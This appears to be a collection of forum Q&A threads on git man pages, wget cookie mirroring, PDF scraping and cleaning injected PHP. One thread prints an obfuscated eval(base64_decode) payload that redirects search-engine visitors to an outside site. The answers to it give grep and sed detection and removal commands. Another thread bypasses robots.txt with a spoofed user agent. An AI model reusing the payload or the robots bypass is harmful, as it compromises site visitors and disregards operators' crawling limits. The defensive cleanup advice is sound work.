I'm taking the git man page as an example, but I have seen the example I am about to use many places throughout UNIX/Linux.
Under the git man page, it has the following header:
Main Porcelain Commands
Underneath this header, there are a lot of commands with dashes between such as:
git-clone
Since it is listed under that Commands header, you would assume that git-clone is a command (I'm well aware that git clone [directory] is valid).
But it appears that it isn't, so why does the man page list git-clone as being a command?
The man pages are good, if you can decode them right.
On my system it says git-clone(1). It is the name of a man page about a command, not a command itself.
man git-clone gives:
SYNOPSIS
git clone [--template=<template_directory>]
… showing it with the space instead of the dash.
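To see the connection yourself, you can compare the two forms. This is only a minimal sketch; the exact paths, and whether --help opens man pages or HTML, depend on your installation:
man git-clone          # opens the git-clone(1) page directly
git clone --help       # typically opens the same page via git's help system
git help clone         # likewise
# The dashed helpers still exist in git's exec path on most installations,
# which is why the manual pages keep the historical git-<command> names.
ls "$(git --exec-path)" | head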
Before I get into the question, I want to say that a similar question helped me get past the initial login. My issue is as stated below.
There's a website that I'm trying to mirror. It is something that I have an account for. I'm using wget as my tool of choice. I tried curl, but found that while submitting post data is easy with it, wget is better equipped for the task at hand.
The website has an initial login page that it redirects to. After this, you have access to everything on the website. Logins do timeout after so long, but that's it.
With the wget commands below, I was able to successfully save my cookies, load them, and download all child folders. My issue, however, is that every child folder's index.html is just the same login page. It's as if the cookie worked fine for the root folder but for nothing beneath it.
The commands I used were:
wget http://site.here.com/users/login --save-cookies cookies.txt --post-data 'email=example#test.com&password=*****&remember_me=1' --keep-session-cookies --delete-after
wget http://site.here.com/ --load-cookies cookies.txt --keep-session-cookies -r -np
Note that the post-data variables/ids are different and that I had to download the login page to see what they were.
Secondly, note that if I didn't set remember_me to 1, cookies.txt would be different.
Without remember_me=1
.here.com TRUE / FALSE numbershere CAKEPHP garbagehere
With remember_me=1
site.here.com FALSE / FALSE numbershere CakeCookie[rememberme] garbage
.here.com TRUE / FALSE numbershere CAKEPHP garbagehere
The result is that the former only downloads the login page, while the latter reaches all the child folders, but each child contains nothing more than an index.html of the login page.
I'm kind of stuck, and my experience with wget and HTTP is very limited. What would you do to get past this? Generate a cookie for each child? How would you automate that instead of manually creating a cookie file for each child?
P.S.: I'm using Linux, in case that affects the answers I'm given.
Figured it out. Kind of.
When I wget with the options above, I get all the children. If I then wget each child (again with the options above) and make sure to specify the folder by ending the URL with "/", it works.
Not sure why the behavior is like this, but it is. When I do this, it has no problem grabbing the children's children, or anything below that.
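If you want to avoid doing that by hand, a rough loop like the following should work. This is only a sketch: the login URL and post-data fields are copied from the commands above, and folder1/folder2/folder3 stand in for whatever the real child folders are called.
#!/bin/sh
# Log in once and save the session cookies (same as the first command above).
wget http://site.here.com/users/login --save-cookies cookies.txt \
     --post-data 'email=example#test.com&password=*****&remember_me=1' \
     --keep-session-cookies --delete-after
# Re-use the same cookie file for every child folder; the trailing "/" matters.
for child in folder1 folder2 folder3; do
    wget "http://site.here.com/$child/" --load-cookies cookies.txt \
         --keep-session-cookies -r -np
done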
I'd like to write a simple web spider or just use wget to download pdf results from google scholar. That would actually be quite a spiffy way to get papers for research.
I have read the following pages on stackoverflow:
Crawl website using wget and limit total number of crawled links
How do web spiders differ from Wget's spider?
Downloading all PDF files from a website
How to download all files (but not HTML) from a website using wget?
The last page is probably the most inspirational of all. I did try using wget as suggested there.
I tried it on my Google Scholar search result page, but nothing was downloaded.
Given that my level of understanding of webspiders is minimal, what should I do to make this possible? I do realize that writing a spider is perhaps very involved and is a project I may not want to undertake. If it is possible using wget, that would be absolutely awesome.
wget -e robots=off -H --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3" -r -l 1 -nd -A pdf 'http://scholar.google.com/scholar?q=filetype%3Apdf+liquid+films&btnG=&hl=en&as_sdt=0%2C23'
A few things to note:
Use of filetype:pdf in the search query
One level of recursion
-A pdf for only accepting pdfs
-H to span hosts
-e robots=off and use of --user-agent will ensure best results. Google Scholar rejects a blank user agent, and pdf repositories are likely to disallow robots.
The limitation of course is that this will only hit the first page of results. You could expand the depth of recursion, but this will run wild and take forever. I would recommend using a combination of something like Beautiful Soup and wget subprocesses, so that you can parse and traverse the search results strategically.
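As a rough illustration of that idea, here is a shell-only sketch that uses grep in place of Beautiful Soup: it walks the first few result pages via the start= parameter and feeds any direct PDF links it finds back to wget. The query string, the ten-results-per-page assumption and the link-extraction pattern are all assumptions, and Google Scholar may throttle or block requests like this.
#!/bin/sh
UA="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3"
QUERY="filetype%3Apdf+liquid+films"
for start in 0 10 20; do
    # Grab one page of results (assuming 10 results per page).
    wget -q -O results.html --user-agent="$UA" \
        "http://scholar.google.com/scholar?q=$QUERY&start=$start"
    # Pull out direct .pdf links and download each one.
    grep -o 'http[^"]*\.pdf' results.html | sort -u | while read -r url; do
        wget -nd -e robots=off --user-agent="$UA" "$url"
    done
done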
I've been having issues on my server with the following PHP inserted into all of my Drupal and WordPress sites.
I have downloaded a full backup of my sites and will clean them all before changing my FTP details and re-uploading them. Hopefully this should clear things up.
My question is:
Using Notepad++, is there a *.* style search I could use to scan my backup files and delete the lines of malicious code without having to do them all individually on my local machine?
This would clearly save me loads of time. Up to now, I've been replacing the following code with a blank string, but the encoded eval payload varies on each of my sites.
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));
I would change your FTP details immediately. You don't want them hosting warez or something if they have been able to work out the password.
Then shutdown your site so that your visitors are not subjected to any scripts or hijacks.
As far as searching goes, a regex like this should sort it out:
eval\(base64_decode\("[A-Za-z0-9+/=]+"\)\);
(The character class covers the full base64 alphabet, including +, / and the = padding, so it will still match if the payload differs from site to site.)
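If you would rather do the cleanup from a shell than from Notepad++, something along these lines should work on a local copy of the backup. It is only a sketch: test it on a spare copy first, since any regex-based cleanup can break files if the injected code deviates from this exact pattern.
# Find files containing the injected eval() call, then strip it in place,
# keeping a .bak copy of every file that gets modified.
grep -rl 'eval(base64_decode("' . | while read -r f; do
    sed -i.bak 's|eval(base64_decode("[A-Za-z0-9+/=]*"));||g' "$f"
done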
I've also had the same problem with my WordPress blogs: the eval base64_decode hack. The PHP files were being injected with those eval lines. I suggest you reinstall WordPress/Drupal, as some other scripts may already be present in your site, then change all your passwords.
Try running grep over SSH, e.g. grep -r -H "eval(base64_decode". It'll show you which files are infected. Then, if you have time, automate the process so you will be notified in case it happens again.
And in the future, always update WordPress/Drupal.
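One way to automate that check (just a sketch: the document root, the e-mail address and the availability of a mail command are all assumptions) is a small script run from cron:
#!/bin/sh
# Hypothetical nightly check: warn if the injected eval() call reappears.
SITE_DIR=/var/www/mysite        # adjust to your document root
FOUND=$(grep -rl 'eval(base64_decode(' "$SITE_DIR" 2>/dev/null)
if [ -n "$FOUND" ]; then
    printf 'Possible injected code found in:\n%s\n' "$FOUND" \
        | mail -s "base64 injection alert" you@example.com
fi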
It's easier if you can use dedicated tools to remove this malicious code, because it can be tricky to find a regex that matches all of it, and you never know whether it worked or whether you broke your site. Especially when you have multiple infected files, you should first identify the suspicious ones with the following commands:
grep -R "eval.*base64_decode" .
grep -R "return.*base64_decode" .
but that may not be enough, so you should also consider using PHP security scanners.
For more details, check: How to get rid of eval-base64_decode like PHP virus files?.
For Drupal, check also: How to remove malicious scripts from admin pages after being hacked?
I updated my checkout page, mostly by editing the file at ....wp-ecommerce/wpsc-theme/wpsc-shopping_cart_page.php
It worked fine for a while, but now some of the changes have reverted to their previous state. In fact, I can even delete the file mentioned above, which means WordPress is loading this file from somewhere else. Any idea from where, and what happened? Thanks for your help.
Although I don't have a specific answer to your question, if you use an IDE (like Dreamweaver or Eclipse) you could grab a copy of your site's code to your local PC and do a code search for something that is unique to that page.
I.e., if there is a <div class="a_unique_div"> tag somewhere on that page and you know it's only visible on that page, search the code for it and it may give you a clue about which file is being used for the output. Even if it's used on only one or two pages, it may bring you closer to working it out.
Alternatively, if you have SSH access you could try and "grep" for the code by SSHing into your server and running a command like:
grep -i -R '<div class="a_unique_div">' /www/your_wp_folder/
(where /www/your_wp_folder/ is the path to your WordPress installation)
Though for this you'll need SSH access, grep installed on the server, etc, so it may not be a viable option.
Good luck!
I am testing one of my server implementations and was wondering if I could make curl get embedded content? I mean, when a browser loads a page, it downloads all associated content too... Can someone please tell me how to do this with curl?
I don't mind if it dumps even the binary data onto the terminal... I am trying to benchmark my server (keeping it simple initially to test for bugs... probably after this, I will use one of those dedicated tools like ab)...
wget --page-requisites
This option causes Wget to download all the files that are necessary to properly display a given HTML page.
If you want to download recursively, use wget with the -r option instead of curl. Also check the wget man page for options to fetch only certain types of files.
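As a minimal sketch of how that might look for a quick benchmark (example.com and the output directory are placeholders):
# Fetch the page plus its images, CSS and scripts, much like a browser would,
# spanning hosts in case assets live elsewhere, and time the whole run.
time wget --page-requisites --span-hosts --no-directories \
     --directory-prefix=/tmp/pagetest http://example.com/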